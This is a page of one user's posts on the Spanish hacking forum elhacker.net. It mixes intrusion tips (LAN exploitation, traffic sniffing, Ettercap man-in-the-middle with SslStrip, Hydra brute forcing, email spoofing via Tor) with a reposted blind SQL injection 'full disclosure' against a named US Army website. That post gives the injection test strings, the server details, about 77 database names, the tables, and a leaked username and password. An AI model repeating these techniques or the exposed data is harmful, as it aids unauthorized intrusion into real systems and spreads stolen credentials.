elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [27] 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ... 55
261  Seguridad Informática / Hacking / Re: Caso práctico. Vulnerabilidad con DMZ en: 19 Enero 2010, 18:00 pm
DMZ= zona desmilitarizada, y no se que tiene que ver con lo que pretendes hacer... no te estarás confundiendo con NAT??¿¿

pero vamos, no se porque te complicas tanto, una vez que estás dentro de la misma LAN no tienes que andar tocando nada del router, simplemente escanea el Pc a ver que servicios tiene corriendo, averigua si alguno es vulnerable y explótalo
262  Seguridad Informática / Hacking / Re: Programa para deshabilitar el internet en el momento que quieras en: 17 Enero 2010, 21:09 pm
bueno, seguro que es más simple que hacerte un programa tu... se me ocurre que si tienes firewall, se podrá programar para que no deje salir tráfico con destino al 80, y con eso simularás no tener acceso a internet.. si quieres hacerlo un pelín más sofisticado (tampoco mucho :p ), deja habilitado el tráfico saliente con destino puerto 80 pero deshabilita el 53 UDP, que es el que se usa para establecer conexión con los Servers DNS
263  Seguridad Informática / Hacking / Re: Hack Ambiente Windows Red isaserver ? en: 17 Enero 2010, 20:50 pm
sniffa tráfico para intentar conseguir la pass que necesitas
264  Seguridad Informática / Hacking / Re: [HOW TO] Ataque modelo Wifi en: 17 Enero 2010, 20:48 pm
si, si tienen bien configurado un filtro anti arp poisoning es posible que salte el firewall, pero si no salta en este punto no debería de saltar con el SslStrip
265  Seguridad Informática / Hacking / Re: WLAN, Ettercap y MSN messenger en: 16 Enero 2010, 12:03 pm
buenas

a ver, las conversaciones van en texto plano, así que tienes que poder verlas... el problema puede residir en que estés intentando escuchar directamente el tráfico desde un Pc cableado a el Portatil que no lo está (o viceversa), para solucionar esto haz un MiM con ayuda del Ettercap y listo.

en cuanto al tráfico cifrado con SSL/TLS, es prácticamente imposible conseguir descifrarlo (al menos por tí, quizás tus tatatataranietos...), por lo que tienes que apañártelas con alguna triquiñuela como por ejemplo hacerle un MiM y usar SslStrip, para más info busca que hay muchos posts con esto.

p.d.: para que las conversaciones y demás del msn no viajen en texto plano hay plugins que te tunelizan las conversaciones o simplemente te enchufan SSL/TLS
266  Seguridad Informática / Hacking / Re: ERROR EN MEDUSA en: 15 Enero 2010, 12:45 pm
nunca he usado Medusa, prueba con Hydra para contrastar
267  Seguridad Informática / Hacking / Re: las ip de un correo se pueden falsear o suplantar? en: 15 Enero 2010, 11:41 am
hombre, con PHP lo que harías sería crear un front-end del Servidor SMTP... el juego lo tienes que hacer en el propio Server SMTP (tuyo o alguno ajeno), un ejemplo es el que puse antes, tu te montas un Server SMTP en tu Pc, lo configuras normalmente, pero haces que salga a través de un Proxy como Tor, de manera que parecera que cada vez se está mandando el correo desde una Ip diferente
268  Seguridad Informática / Hacking / Re: ERROR EN MEDUSA en: 15 Enero 2010, 11:36 am
http://forums.remote-exploit.org/newbie-area/14045-error-medusa.html
269  Seguridad Informática / Nivel Web / Demo de XSS+BeeF en: 14 Enero 2010, 16:20 pm
muy buen video explicando algunas de las posibilidades de esta maravillosa aplicación

http://www.youtube.com/watch?v=Q9pQ3NlJtFE
270  Seguridad Informática / Nivel Web / Blind SQL injection en una Web de las fuerzas des-armadas de USA en: 14 Enero 2010, 12:38 pm
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/                 

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)

and 1=2– (False)

Ok, in this picture we can see all main informations about webserver.

Main information:
Citar
Código:
[b]#Version[/b]: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
[b]#User[/b]: Dynatouch
[b]#Database[/b]: AHOS
[b]#Host Name[/b]: AHSGSVDAHQIT130
All databases:
Citar
Código:
[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES
We can access information_schema, so let’s see the tables from principal database “AHOS

Citar
Código:
[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items
Now, here are some interesting tables, like mgr_login_passwords.

Here i found user : password columns, with :
Citar
Código:
#Username: Dynatouch
#Password: AHOS
wtf! :|
That it’s all! Bye, TinKode…



dejo el enlace: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/
Páginas: 1 ... 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 [27] 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 ... 55
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines